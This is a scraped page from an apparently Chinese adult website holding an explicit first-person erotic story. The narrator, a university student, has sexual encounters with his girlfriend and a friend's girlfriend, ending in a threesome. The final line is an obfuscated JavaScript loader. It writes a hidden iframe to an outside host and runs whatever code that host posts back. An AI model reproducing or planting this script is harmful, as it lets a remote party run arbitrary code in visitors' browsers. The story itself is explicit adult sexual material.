字幕網- 每日更新 永久免費

我和現在老婆是大學的同班同學,也算很有緣分吧,原來報考的都不是那個學校,後來陰差陽錯的都到了一個學校,而且一個專業。剛進大學的時候,那時我剛失戀,以前那柏拉圖式的愛情,對我打擊很大,變的不愛和人交往。我老婆叫小依,她165 公分身材,皮膚比較白,長得是不錯,但是胸部比較小。我178公分的身材,也挺帥的(公認的)就是因為我那酷酷的樣子,才造就了後麵的一些故事。
  大學很多事情基本上都忘記了,記得大學剛進去的時候,我對愛情基本上沒有什幺想法,一些女的對我表示好感,我都直接拒絕了,當時心裏一直覺得,我放不下前一段感情,就不能再去拿起另一段感情,一直覺得感情就是要認真的對待,她就是其中的一位。
  剛進大學的時候,我就做了班裏的體育委員,帶領班級的籃球隊,認識了三個兄弟,以下稱他們大哥,老三,老四(我是老二,因為我年紀排第二)我們錢都是一起花的,每個人一個月差不多都是800-1000,所以一般都是到月中的時候,我們的錢都花完了,接下來基本上吃泡麵,生活那個苦啊,(其實現在想想,那時候的生活挺讓人懷念的)老大也是一個帥小夥子,183 的身材,有一個高 中時代的女朋友,自然也上了,也算有了經驗,天天打電話,膩的讓人受不了,老三就很猥瑣了,165 左右,一般我們打完籃球,坐下來聊天的,基本上都是老三在跟我們傳授他的經驗,用他的話說他悅女無數,基本上那個女的讓他看一下,就知道穿什幺型號的內衣,聊一下就知道能不能去開房間,他也有個高中時代的女朋友,不在一個城市讀書,每個月都會過來一兩次,過來自然免不了嘿咻了。老四175 左右,一個純情小男生的樣子,大學後麵大家都叫他「two hours 」那是後話了。
  大學生活就這樣,聊聊天,打打屁,喝喝酒,混著,大一下學期,過完年回來,小依就開始對我展開了攻勢,我們籃球隊早上都有早鍛煉,每天早上她都泡一杯牛奶等我早鍛煉結束,等月底我們錢用完了,她經常會請我們吃飯,其實心裏還是有點感動的,兄弟們都說:「依了她算了。」但是我卻覺得沒法接受,就一直沒回答。
  那天,我們班跟別的班級籃球比賽,我們班大勝,就決定晚上出去慶祝,小依是我們班後勤的,自然也一起去了,就在校門口的小餐館定了位置,碰到了同係一個班級籃球隊也在聚餐,就並桌,他們班的隊長拉著小依,一直要她喝酒,「小依,來,我再敬你一杯。」看她喝的差不多了,有點不忍心,就接過她的酒杯,「好了,她差不多了,我來替吧。」「你又不是她的誰,管得著嗎」他小聲的對我說心裏很鳥火,心裏想,那阿三咋一點都不懂得憐香惜玉。見他又要找她喝,終於火了。
  「老板,拿10瓶二鍋頭」我說(賣的是紅星二鍋頭,小瓶,56度的好像)「是男的我們一人5 瓶,喝完你還想喝,我們繼續」我說「誰怕誰,來,喝」我心裏一沉,心想,我日,5 瓶你還能喝得下,(剛開始大家啤酒都喝的差不多了)兄弟們都在起哄,說出去的話,潑出去的水,既然他都說了,喝不下也要喝,不能當孫子。心一狠,喝吧。那二鍋頭,一瓶可以倒兩杯一口杯,十杯下去,沒啥感覺,就覺得喉嚨火辣辣的,那小樣一看我那氣勢,還沒喝完就跑了,心裏想,5 瓶二鍋頭也不就那事,過一會兒,大家都散了,我也站起來,發現暈,很暈,開始找不著北了,接著的事情就不記得了,後來小依告訴我,那時候我很醉,老大他們扶我去開了房間,小依就留著照顧我,記得那時候就是吐,吐得一塌糊塗,迷迷糊糊就睡著了,隱隱約約聽到有人洗澡的聲音,後來一個人鑽進被窩,我翻過身,抱了一下,以為是老大,(以前晚回去,宿舍關門,兄弟幾個也都是去開房間,兩個人睡一間,省錢,)「嗯」覺得有點不對勁,女人聲音,我靠,怎幺回事,睜開眼睛一看,馬上把手抽開,「小依!!!」「你喝多了,他們回去了,我照顧你,天快亮了,有點困,就進來睡一下,你不介意吧。」「不介意。不介意」冷場!!!!大家都不知道說什幺。覺得頭有點痛,用手揉揉太陽穴。
  「謝謝你。」小依
  「不用謝,那小樣的我早看她不爽了」
  「頭還痛吧」
  「嗯」
  「幫你揉揉」小依
  「嗯」她側過身,一隻手撐著枕頭,在揉我的太陽穴,長發垂在枕頭上,老二就馬上立正了,感覺好尷尬。
  「還痛嗎」小依
  「不痛了,謝謝」心裏想,就揉幾下就能不痛,我還真虛偽。
  「你困嗎」小依
  「不困了」心裏想,你這樣我怎幺睡得著啊,……「那你要不要做點什幺」「做什幺」心裏想,這個不會是暗示叫我上她吧?
  「……」
  「你想幹什幺都可以」
  ??心裏一疙瘩,真的想什幺來什幺。那熱血都衝到腦子裏去了,猶豫了一下,腦子還是鬥不過下半身的,一把把她壓在身下,開始解她的扣子,她閉上眼睛,脫掉她外衣,迫不及待的把手按在她的乳房上,硬硬的,又軟軟的,隔著胸罩,還真不是什幺感覺,她輕輕的「嗯」了兩聲,更讓人受不了,手翻到她背後,想去解她胸罩,解了幾次,怎幺都解不下來,以前看A 片的時候,男主人總是一下就能把她胸罩解下來,可是到了我這邊,怎幺就不是哪幺一回事,心裏懊惱,小依睜開了眼睛,輕笑了一聲,感覺無限的尷尬,小依把手繞到背後,一下,就把胸罩解下來了…兩個乳房跳出來,一陣暈眩,(不知道是酒還沒醒,還是什幺的)迫不及待的吻著她的乳房,感覺乳頭硬硬的,一隻手探進她的褲子。胡亂的摸著,感覺好多水,滑滑的,「嗯……嗯……」小依輕聲的叫著解下她的褲子,也解下自己的褲子,老二馬上跳出來,我的陰莖差不多16厘米,今天感覺特別粗大,充血厲害,提搶上馬,準備插進去的時候,突然腦袋裏生出一個念頭。
  鬼使神差的就問了一句「你是不是處女」
  「……」沉默,「不是」
  心裏不知道是什幺滋味,好像有點如釋重負,又有點失落。
  「你是第一次嗎?」小依
  「嗯」
  「對不起,你可以不要的」小依。
  心想,都脫光光了,怎幺停下來。心裏一狠,插了進去,感覺大雞巴被包的緊緊的,有一種要射的衝動,心想,不會這幺快吧,以前手淫的時候都要弄半天。
  有水珠劃落到手上,熱熱的,心裏一驚,她怎幺哭了。
  「木,我愛你」
  「……」不知道怎幺回答,感覺心裏很難受,一下清醒過來,「對不起」我說,準備把大雞巴抽出來,小依一下抱緊我,「要了我,好嗎?」「恩」我輕輕的動著,
  「嗯,嗯……」她閉著眼睛,小聲的叫著,眼角掛著淚…好心疼,靠在她耳邊,小聲的說「我也愛你…」不知道是怎幺結束的,射了,射在她裏麵了。看著她一臉的幸福…「你可以不用負責的,可以當什幺事情也沒發生」小依那時候就決定了,我不能這樣對她,我要愛她,我要疼她,「我愛你」,緊緊抱在一起…人家說,女人很看重第一次,其實男人也是,我沒有處女情節,但是我其實挺在乎自己的第一次的,她是我第一個女人。後來聽她說,那天晚上她沒有高潮,還是很想做,很想我插她,但是她不敢說。
  大二的時候大哥的女朋友也考上了我們學校,是我們的學妹,我們就合計著一起出去租房子,租了一套兩室一廳的房子,乾柴烈火,又是剛享受到這個樂趣,自然免不了天天做愛,有的時候聽到隔壁大哥跟大嫂做愛的聲音,總是無限衝動,抱著老婆也會幹上了,此起彼伏的,也算趣味無限,時間就這幺過著,轉眼間有一個年過了,一年時間好像大家都開始有了疲勞期,開始不那幺熱衷於做愛,從開始的一天幾次,到最後的幾天一次,很多事情總是在人沒有準備的時候發生。
  (原來這中間還有一大段,覺得寫不下去,就刪掉了,包括大二那年過年,我去小依家拜年,她家裏人也比較喜歡我,在她家住了幾天,有一天晚上小依溜過來跟我一起睡,她媽媽知道了,第二天早上還拿了長期避孕藥給她,我才發現她老媽真開放,從那個時候我在她家裏,我們兩個就住在一起了。)小依對我一直都有一種愧疚感,覺得她的第一次不是給我,而我的第一次卻是給她,覺得不公平,經常說有空幫我找個處女讓我試試看什幺感覺,我每次都開玩笑的說,「那好,你快去弄一個來。」然後她總是很認真的說,「好的。」我總是笑笑,從來沒有把這話當真,沒想到後來,她還真給我弄了一個處女,其實我沒有處女情節。這個都是後話了。現在先說說我的第二個女人:大哥的女朋友。
  自從我,小依,大哥,大嫂,四個人合租了後,兩房一廳兩衛,我跟小依睡的是主臥室,帶衛生間,裏麵有熱水器,公用的那個衛生間沒有熱水,所以大哥跟大嫂洗澡都在我房間裏的衛生間裏洗,天天抬頭不見,低頭見的,無意間總會看到一些春光,比如那穿這睡衣,不帶胸罩的乳頭,比如睡裙底下的內褲,比如彎下腰領口可看見的整個乳房,不得不說,大嫂的奶子真的很大,D 罩杯,真讓人眼饞。
  有的時候,我們兄弟四人聊天的時候,偶然會聊到大嫂,大哥總說,大嫂奶子真大,我總會附和,是啊,是啊,我看見過。大哥也不生氣,總說,漂亮吧,我總是在那邊傻笑。
  大學的時候我們有選修第二門外語,大一剛到的時候,我就義無反顧的報了日語,老三,老四報的也是日語,大哥和小依報的都是法語,大哥覺得報法語的美女多,反正每次上課都在睡覺,睡在一堆臭氣熏天的男人堆裏,還不如睡在那香氣彌漫的女人堆裏。那女孩子如小依,自然是覺得法語比較浪漫,我實在不理解,這個是什幺理論,嘰裏咕嚕,能聽出浪漫?那我們三個一直都有一個願望,希望能完全聽懂日本先輩mv裏所說的話,啥亞麻的,雖然到最後,我們也沒有能學會幾句日語,日本的女優層出不窮,我們也還是不懂她們在喊些什幺,但是並不影響我們對日語大片的研究,說著說著好像又扯遠了。
  那天下午大哥和小依去上法語課,我們日語課的老師請假沒來,我就早回宿舍了,5 月的天氣,的確是有夠熱的,打了一會兒籃球,回到宿舍,看了下大哥的房間,沒人,以為大嫂也不在,於是就把自己剝光光,準備去洗一下澡,推開衛生間的門,我嚇了一跳,大雞巴馬上起立,我終於看見了大嫂那可以勾起那無數人獸欲的身體,那滿身的泡沫,那高高凸起的乳頭,那掛著泡沫的陰毛。
  我腦子裏第一個閃過的是,洗澡怎幺沒有聲音,第二,怎幺沒有關門,第三,怎幺我該說什幺,臆想中的「啊」的一聲沒有聽到,大嫂看了下我的大雞巴,她說的第一句話竟然是「好粗」,我無限尷尬,馬上退了出去,穿上褲子,大雞巴自然還是敬禮狀態。坐也不是,站也不是,渾身不自在。過一會兒,裏麵嘩啦啦的水聲……「幫我拿一下衣服和浴巾好嗎?」我一蒙,洗澡還不帶浴巾和衣服的嗎?回答「哦,在哪裏?」「我房間右邊的一個衣櫃」走到她房間,打開她的衣櫃,一堆內褲,一堆內衣,還有一堆衣服,突然想到,糟糕,忘記問要哪一件了,現在去問又不可能,看見一套黑色蕾絲的,覺得漂亮,腦子裏突然閃過她穿這個是什幺樣,順手就拿了起來,順便拿了件衣服,拿了條浴巾就走了,敲了門,把衣服遞進去瞬間,突然想到,我忘記拿褲子了,馬上屁顛屁顛的又跑過去拿褲子,拿了褲子,回來準備敲門的時候,門開了,她穿著吊帶上衣,蕾絲小內褲就出來了,小內褲上隱約可以看見陰毛,我又悶住了,不知道該說什幺,她接過我手上的褲子,穿上。
  「好看不?」
  「嗯」我條件反射回答。
  突然她伸手摸我的大雞巴一下。
  「當作補償」她笑嗬嗬的走回自己房間,又轉過身對我說「好大,比我老公的大。」馬上衝進房間洗了個澡,一整個下午心裏老是不時想起大嫂的身體。其實我一直覺得,兄弟妻不可欺,後來發生的事情讓我想法發生了變化。
  過了幾天,下課時,大哥叫我出去聊天,我想,完了,大哥一定知道了,兄弟都沒有的作了,心裏其實還挺委屈的,想著,我又不是故意的,誰叫她不關門,而且我又沒碰她,她還摸了我呢…吃虧的該是我吧。大哥叫我出去,跟我磨嘰了半天,一直講著沒有營養的話,最後扯著扯著才扯到了大嫂上麵,他說:「阿紫怎幺樣?」我心想:你說人呢,還是身材呢,還是啥的?我該怎幺回答呢,沉默。
  「阿紫(大哥叫大嫂這幺叫的)說昨天你看見她洗澡了。」「嗯,我不是故意的,覺得不痛快就揍我幾拳。」我們繼續沉默「阿紫說她也看到了你的雞巴。」「恩,那時候我也準備去洗澡。」「阿紫說她摸了你的雞巴。」
  「啊(升調,驚訝中)……嗯」心裏想怎幺這個也能說。
  「你覺得阿紫怎幺樣?」
  「很好」
  「想不想幹她?」
  沉默……
  「沒想過」其實我真的沒有想過上她,我對著電腦發誓,那時之前真的沒有想過。
  「要是她想讓你幹呢?」
  「不行。」
  後來又說了些什幺,不記得了。接下來的一段時間是痛並快樂的,大嫂開始時不時的讓我看到她的私密部位,在房間裏基本上都不穿內衣,夏天衣服薄,每次都能看見她高高的乳頭,時不時還能看見她整個乳房,好幾次她洗完澡出來,穿著睡裙,都不穿內褲,有的時候還故意讓我看見她的陰部,小依不在的時候還會挑逗我,有的時候大哥看見了,對著我傻笑,我在想這個是什幺狀況,真要讓我幹你女朋友?
  時間總是悄悄溜走,轉眼間又是一個暑假。期末考完了,大家都準備回家,像往年一樣,今年暑假我也沒打算回家,小依回去了,她家裏人叫她回去,她奶奶要過大壽,大哥,大嫂家離這個城市比較近,所以一定會回去,今年暑假就隻剩我一個人,準備找點暑期工打打。送小依去坐車的時候,小依把我拉到一邊,她說「阿紫想讓你那個你為什幺不要?」「啊(繼續升調,驚訝中),誰說的?」「阿紫跟我說的,其實我沒有意見,你可以要她,這樣我覺得公平點。」「亂說話。」心裏想,這個世界怎幺了,我的思想有問題還是她們。
  「反正我覺得要是可以的話,你就做吧。」小依說好吧,我承認,我開始有點想了,我開始覺得,如果再有那幺個機會的話,我就搞吧,但是我想,暑假是沒有機會了吧。
  暑假在忙碌的打工中度過,一晃就是一個月,那天我上早班,我在的餐廳二十四個小時營業,我上小夜,12點下班,今天收到大哥的一條短信,「好好幹」。
  莫名其妙的,什幺是好好幹,應該是能偷懶就偷懶才差不多,又不是作長期的,用得著那幺拚命工作嗎。看來大哥頭又被門給擠了,總說胡話。回家的路上,順便買了包泡麵,準備明天中午應付一下。
  到樓下,抬頭一看,不對,我的房間燈怎幺是開的,有小偷,應該不會,小偷沒那幺大膽,小依回來了?不對,過兩天她奶奶大壽,跑上樓打開門,進了我房間一看,大嫂在我房間,穿著睡裙,靠在床上,正看著日本大片,睡裙微微掀起,露出了陰部,沒有穿內褲,一隻手正撫摸著陰蒂,一隻手抱著她的大奶子在揉,我又是一驚,準備退出去。
  「別走。」大嫂說
  「大哥呢?」
  「沒來,這個月你是我的。過來。」
  「……」
  「快點過來。」大嫂說
  「你怎幺回來了?」我說
  「回來勾引你,犒勞你,快過來。」
  「……」
  「快過來,我等了你一天了。」
  其實我的雞巴在推開門的一瞬間就已經充血完畢,我終於下了一生中的一個重要決定,我要幹她。以我這輩子最快的速度脫掉了褲子和衣服,衝了上去。
  「你的雞巴好大啊,比我老公的大,我要你幹我。」我爬上去,兩隻手握住她的奶子,好大,真的好大,兩隻手抓不住,她的乳頭硬硬的,一個月沒有做愛了,我使命的揉著她的奶子,她一隻手抓住我的雞巴,閉著眼睛,嘴巴虛張。
  「好大,我好喜歡,好硬。」
  我脫掉她的睡裙,雙唇馬上對這她的乳頭,吸允,兩隻手不停的揉著她的奶子,好堅挺,好有彈性,她的兩個奶子讓我著迷。
  「好癢,好癢,我想要,進來,快插進來,我都等你一晚上了。」她張開了雙腿,拉著我的雞巴就往她的陰部塞,「快進來,快進來,我要,我要你的雞巴。插我。」我的雞巴碰到她的陰部,好滑,好多淫水,順著留下,留在竹席上,濕了一片。
  順著她的身體,往前一推,有剝開一層肉的感覺,她的陰道口很小,進去後,感覺裏麵又一個世界,很軟,卻不緊,隻有陰道口緊緊抓著我的雞巴,往前用力的一頂,才能感覺到她的花心,整個陰莖有一種很溫暖的感覺,一些淫水因為我雞巴的侵入,從她的陰道裏被擠出來,順著她的屁股留下。
  「啊……啊……,快點,快點,我要,快點,用力插我,我快高潮了。」我用力抽插了幾下,就感覺她陰道開始有節奏的收縮,開始出現了痙攣,前後抽插不到20下,她就用力的抱緊我。
  「不要動,不要動。好舒服啊,好舒服啊」我輕輕的動了一下,她馬上抱緊我,不讓我動,夾緊雙腳,在享受高潮。
  「不要動,先不要動,我好舒服,你的雞巴讓我好舒服,一下就高潮了」看著她兩眼迷茫,零亂的長發灑在床上,好誘人,輕輕的擠壓著她的乳房,讓我忍不住咬上一口,用力的吸允著,大概兩分鍾,她恢複過來了。
  「我還要,來,插我,我好舒服。」
  她的陰道不斷有淫水流出,打濕了我的睾丸,感覺有水順著我的睾丸留下,滴在竹席上,我有節奏的抽插著,一邊咬著她的乳頭,我太愛她的乳房了,不舍得放嘴其實這個姿勢不舒服,我脖子要彎著,但是我舍不得放開。
  「啊……啊……啊……好漲啊,好漲啊,你快撕裂我的小妹妹了,好舒服啊。
  用力點,快點。」我加快了抽插的速度,不得不放開她的乳房,抬起她的雙腳,終於可以很容易的頂到她的花心了,用力的抽插著。
  「啊……啊……啊……,快點,快點,好癢啊,好癢。」我用力的抽插著,衝刺著,我快射了,加快了速度,她發現我要射了,眯著眼睛,「啊……啊……啊……,等我一起,啊……,等我一起,快高潮了,快高潮了,好舒服。」我用力的抽插了幾下,就射了,把我這一個月攢下來的貨全部都交代給她了,雞巴抽搐著,不斷的漲大。
  「啊……啊……,不要,不要,等一下,等一下,我快高潮了,用力插我。」「啊……啊……你的雞巴好大,好漲,好舒服,繼續插我。」「不要停,不要停。啊……啊……」「快了,快了,啊……,啊……」我已經高潮了,趁著雞巴還是很硬的時候,用得的頂著,「啊……啊……啊……」大概一分鍾,她也高潮了,「啊……」一聲很長的聲音,她緊緊的抱著我,好像要把我揉進她的身體裏,緊咬著嘴唇,皺著眉頭。
  過了幾分鍾,她放開了我,我從她的身上滾到旁邊,輕輕的撫摸著她的乳房。
  其實這次從我插進去,到我射了,還不到十分鍾,我很衝動的就射了。
  「好舒服啊,好久沒有這幺舒服了。」大嫂「……」「哈哈,我終於勾引到你了,終於把你給吃了。」「……」「喂,你啞巴了?」「沒有,不知道說什幺。」我說「對不起,」她說
  「啊?對不起什幺?」我說
  「我把你給上了,我會對你負責的,以後隻要你想上我,我把老公都踹床底下去。哈哈」「……」繼續我的啞巴。
  「你的雞巴好大啊,好容易讓我高潮。」一邊撫摸著我的雞巴一邊說。
  「大哥的也不小。」
  「他的比較長,你的比較粗,不一樣,我比較喜歡粗的,有一種被填滿的感覺。」「……」「這個月,我會好好喂飽你的肚子,然後你也要好好的喂飽我。」她說「嗯,我覺得對不起小依。」我轉移話題。
  「我來的時候就跟小依說了,說把你借給我一個月,她什幺都知道。沒問題的。」她說「那大哥呢?」我說「他,都沒空搭理我,在家出不來,才叫我過來找你的,讓你代他來服侍我的。我都一個多月沒做了。」她說「恩,那好吧,你想怎幺樣就怎幺樣。啊,剛才沒帶套,明天要不要去買藥?」「哈哈,不用了,我大姨媽剛過兩天,而且我有吃長期避孕藥,大哥都不帶套的」她說「哦,」她繼續撫摸著我的雞巴,我撫摸著她的乳房,對於她的乳房,從第一次摸到她的奶子,到現在,我都一直鍾愛著,好像有一種特別的吸引力,深深的吸引著我。一會兒,我的雞巴開始慢慢的有了反應,又開始硬起來了。
  「我親愛的大雞巴,該起床了,姐姐來給你按摩,乖哦。」她說「你真色。」我捏了一下她的乳房。
  「我就是色,怎幺了,我這個是會享受,」一邊撫摸著我的雞巴,上下套弄著,「為什幺你的雞巴這幺大呢?」「不知道,牛鞭吃的。」我瞎掰中「吃牛鞭有用?那改天我去弄點給我老公吃,燉的嗎?」她很認真的說著。
  「不是,要生吃」我再次瞎掰。
  「騙人,你壞蛋,那好,現在我要生吃你的大雞巴了。」她翻過身,頭靠近我的大雞巴,看了一下,「你的雞巴真漂亮」「你的咪咪更漂亮」心裏想,雞巴能用漂亮來形容嗎?第一次聽人這幺說。其實這也是至今為止唯一聽到的一個人這幺品論雞巴的。
  「你給我口交好嗎?」大嫂說
  「不行。」
  「為什幺?」
  「你雞巴裏都是我的孩子,我不能把我孩子吃到肚子裏去。」我說。
  「你壞蛋,那我去洗澡,你也要去,一起去。」她坐起來,牽起我的雞巴就往衛生間裏拉。我就順著她去了衛生間。
  「來,你幫我洗。」大嫂說
  我打開花蓮噴頭,調節了水溫,讓溫度感覺舒適,把她拉了過來。打濕了她的身子,給她抹上了沐浴乳,雙手撫摸著她的肌膚,很滑很滑,蕩起了很多泡泡,不知不覺又摸上了她的奶子,戳圓,捏扁,她的奶子,總讓我不可自拔。
  「這幺慢,我自己來,」她衝去了身上的泡沫,拿起噴頭,蹲下來,對著自己的陰道衝著,一根手指套弄著自己的陰道,想衝去裏麵的殘留的精液。抬頭看著我的雞巴。她抓著我的雞巴,抹上沐浴露,上下套弄著,很認真的撫摸的我的雞巴,撫摸著我的睾丸袋,好像對待一個藝術品,生怕它壞掉,淫蕩的表情讓我的雞巴充血更嚴重,有一種要爆掉的感覺,一會兒,她衝去我雞巴上麵的泡沫。
  「好了,現在我要開始午夜的點心了,親愛的,到床上去。」拉著我的雞巴就出去了,把我推到床上去,背對著我,坐在我的胸口上,把我壓在身下,一隻手扶著我的雞巴,張開嘴巴,含著我的雞巴,細細的品嚐著,就像吃著冰棒,不時的舔著我的龜頭,一股酥麻的感覺彌漫著我的全身,就像要融化了一樣,我忍不住掙紮了一下,她壓的更緊了,嘴巴上下套弄著,下身貼著我的胸口摩擦著,一片熱乎乎,濕漉漉的感覺,分不清是剛才洗澡沒擦幹的水,還是她陰道裏留出來的淫水,也許還混著我的精液。
  大嫂含著我的雞巴,翹起她的屁股,對這我的臉,含糊的說:「現在你也要給我口交。」水順著她的陰毛,滴在了我的脖子上,我盯著她的陰部,她的陰部肥肥的,陰毛雜亂的長著,內陰唇露在外麵,一張一開的,露出了裏麵粉紅色的嫩肉,在陰唇的頂部,可以看見一個小豆豆露出。我伸出舌頭,舔了一下她的小豆豆,她陰部就會收縮一下,擠出了一些淫水,順著嫩肉流下,我舔著她的陰部。
  「嗯……嗯……」她含糊著叫著,擺動著屁股,更用力套弄著我的雞巴,奶子貼在我的肚子上,能感覺到她堅挺的乳頭摩擦著我的肚皮,我吸允著她的陰蒂,舔著她的陰唇,嫩肉,不時用我的舌頭擠壓著她的陰道口,她的淫水混著我的口水(應該還有一些我的孩子),被我吸到了嘴裏,有種澀澀的感覺,我雙手伸下去,握住她的奶子,我可愛的奶子,我又一次抓住了你,兩手難以掌握。
  「嗯……嗯……」她掙紮更劇烈了,快高潮了,她抬高屁股,嘴巴也放開了我的雞巴,「我要進來,我要插進來,我要你的雞巴插我。」她轉過身,一隻手扶著我的雞巴,對著我的雞巴坐了下去。
  「啊……好漲,好舒服。」她用力的擺動著身體,胸前的奶子順著她的擺動,跳動著,我忍不是又抓著她的奶子,它實在太讓人著迷了,粉紅色的乳頭,堅挺著。
  「啊……啊……啊……,我要高潮了,要高潮了,好舒服,好舒服」她屁股順著我的雞巴擺動著,畫著圈圈,速度越來越慢,卻越來越用力,我的龜頭,每次都會跟她的花心用力的摩擦著。
  「啊……啊……啊……,高潮了,高潮了。」她揚起脖子,嘴巴虛張,陰道收緊著,顫抖著,她高潮了,整個人癱倒在我身上。感覺到她陰道的收縮,挪動,我也感覺到自己快達到高峰了,我用力的頂著,做最後的衝刺,又一次的射在了她的裏麵。
  那天晚上也不知道我們做了多少次,最後累得兩人都昏昏的睡去,到第二天下午兩點才起來,起來洗了下澡,草草收拾了一下,我去餐廳辭去了工作,開始了我一個月淫亂的生活,那一個月除了我們要外出買東西,在宿舍裏全部都是赤裸著身體,隻要我雞巴一有反應,她就絕對不放過我,時不時的捧著我的雞巴說「真漂亮。」不忘記折騰兩下。
  期間大哥也來過電話慰問她,還說要看我們兩做愛什幺樣,她也答應了,我沒答應,也沒反對,這一個月的時間快把我給榨幹了。
  轉眼間,又到了開學時間,同學們陸陸續續都來學校了,我們還忙碌著我們的激情生活,那天,小依要回來了,說下午四點會到,叫我去接她,我答應了,大哥要過幾天才能過來,中午十一點多的時候,看著大嫂赤裸的身體,我就想,反正還有還有幾個小時,趁著這個時候再搞一次,以後應該機會不多了,畢竟小依在,雖然她說沒有什幺意見,但是難免會尷尬,我也不準備再繼續下去了。
  我抱著大嫂,撫摸著她的奶子,心裏想這個到底是怎幺長的,可以長這幺大,走起路來應該很累吧,我的雞巴漸漸又硬起來了,大嫂還在睡覺,這幾天每日每夜的做愛,生活很沒規律,她睡覺的時候還是握住我的雞巴,感覺我的雞巴又硬起來了,她睜開了眼睛,還在迷糊狀態,我一直覺得女人剛睡醒的時候最性感,也最讓人衝動,我的雞巴忍不住跳動了一下。
  「早,大雞巴,這幺早就起來了,來,姐姐來給你按摩。」大嫂摸著我的雞巴說道。
  其實我最喜歡的姿勢是老漢推車,感覺特別有征服感,最後一天我決定一定要用這個姿勢,不能老是讓她在我身上劃圈圈,每次她先高潮了,她就不想讓我用老漢推車,因為她的身體老是軟趴趴的,動不了。
  我一隻手撫摸著她的乳房,一直手撫摸著她的陰部,偶爾滑過她的陰蒂,偶爾插入她的陰道,一下子她的淫水就泛濫了,順著股溝往下流,我對這她的耳邊吹著氣,輕聲的說,「紫,讓我從後麵幹你好嗎?」她縮著脖子點了下頭,翻過身子,我拖起她的小腹,讓她跪趴著,我單膝跪著,掏起我的雞巴對這她的花叢就插進去,輕輕抽送著,讓她適應我的大雞巴,一隻手托著她的奶子,用力的揉著,一隻手揉著她的屁股,突然,房間的門被退開了,我一驚,小依就站在門口,對著我笑,我現在是做也不是,拔出來也不是,不知道該怎幺辦,我想完了,被她看見了,她應該不想看到吧。
  「你們繼續。」小依說。阿紫在笑。
  「那個……小依……我……」我說,
  「沒事,你們繼續,我先整理一下衣服。」
  小依說「木,我要,繼續插我,不要停。」阿紫看我不動,擺動著她的屁股,那時候我不知道,原來她們兩個是約好了的,早回來,給我個驚喜(是驚嚇吧)準備玩3p. 我輕輕的抽動著,腦子裏一片空白。
  小依放下箱子,脫掉了衣服,從後麵抱著我,兩個小奶子頂著我的背,一隻手撫摸著我的睾丸,手裏充斥著大嫂的淫水。
  「阿紫,你好多水哦。」小依說
  「木真厲害,雞巴又大,插得我好舒服,當然好多水了。」大嫂說,她們輕笑著,我感覺很不自在,有無限刺激,我用力的抽插著,把所有的尷尬變成了抽插的動力,隨著我的抽插,阿紫的陰唇裏外翻動著,又增加了我的刺激,使我更用力的抽插著。
  「啊……啊……啊……,木,好舒服,你癢,我快受不了了,快點快點。」大嫂喊著。
  小依爬到的前麵,一隻手撫摸著大嫂的奶子,一隻手伸到大嫂的胯下,撫摸著大嫂的陰蒂。
  「阿紫,你的奶子真的好大,分一點給我吧。」小依「啊……啊……啊……,用力,用力,我要高潮了,要高潮了。」我更用力的抽插著,卻沒有要射的感覺,龜頭麻麻的,可能最近做太多了,有點麻木。
  感覺到大嫂的陰道開始收縮,高潮了。
  「啊……啊……,受不了了,受不了了,不要,不要,」大嫂整個人癱倒在床上,開始跪不住了,「好舒服啊,」「老公,現在來幹我吧,我也想要。」小依一邊摸著自己的奶子,一邊摸著自己的花叢,說道。
  「阿紫說跟你做愛,女的在上麵的姿勢最舒服,我要在上麵,老公,你躺下。」我躺了下來,小依順著我的雞巴坐了下去,小依的陰道很緊,感覺我的雞巴好像撕開一條裂縫,擠進去了,雞巴被緊緊的包住,四麵都會受到擠壓,很容易讓男的高潮,花心很深,很難插到底部,隻能若隱若現的感覺到花心的存在。
  「嗯,嗯……,」小依一如既往的小聲的哼著。
  「老婆,我愛你,還是跟你做愛最舒服。」我說「難道跟我就不舒服嗎?」大嫂恢複過來了,準備加入。
  「舒服,舒服,都舒服,謝謝你們」我說著。
  「那還差不多,」大嫂起來,虛坐在我頭上,麵對著小依,撫摸小依的奶子,「給我口交。」小依坐在我雞巴上用她緊緊的陰道,套弄著我的雞巴,我舔著大嫂那充滿淫水的陰部,大嫂抓著小依的奶子,兩個女的接吻著(好像女的比較容易雙性戀,兩個男的,好像比較不容易接受。)房間裏充斥著淫蕩的味道,在我射了後,小依也達到了高潮,兩個女的緊緊的抱在了一起,我卻好像成了多餘的。
  後來大嫂她說,跟我做愛最舒服,特別是男下女上,她坐下,我的龜頭正好頂在她的花心上,又比較粗,讓她很舒服,而大哥的比較長點,她沒辦法完全坐下去,她又特別喜歡男下女上,說比較容易高潮,她可以比較投入,後來時不時會來找我,說我的雞巴容易讓她高潮,到現在還一直沒有改變,我所有的女人當中。
  我最喜歡她的奶子,喜歡她給我乳交,但是她不喜歡乳交,她說,那樣她沒感覺,還不如給我口交,跟她還發生了很多事情,容我以後有空再跟你們慢慢道來。
  字節數:23632
  
【完】

上一篇:Sena Nagakura永倉せな_[58P] 下一篇:蜜月驚魂7、8
eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('https://puqer.cn','/cd/104_m/162',window,document)};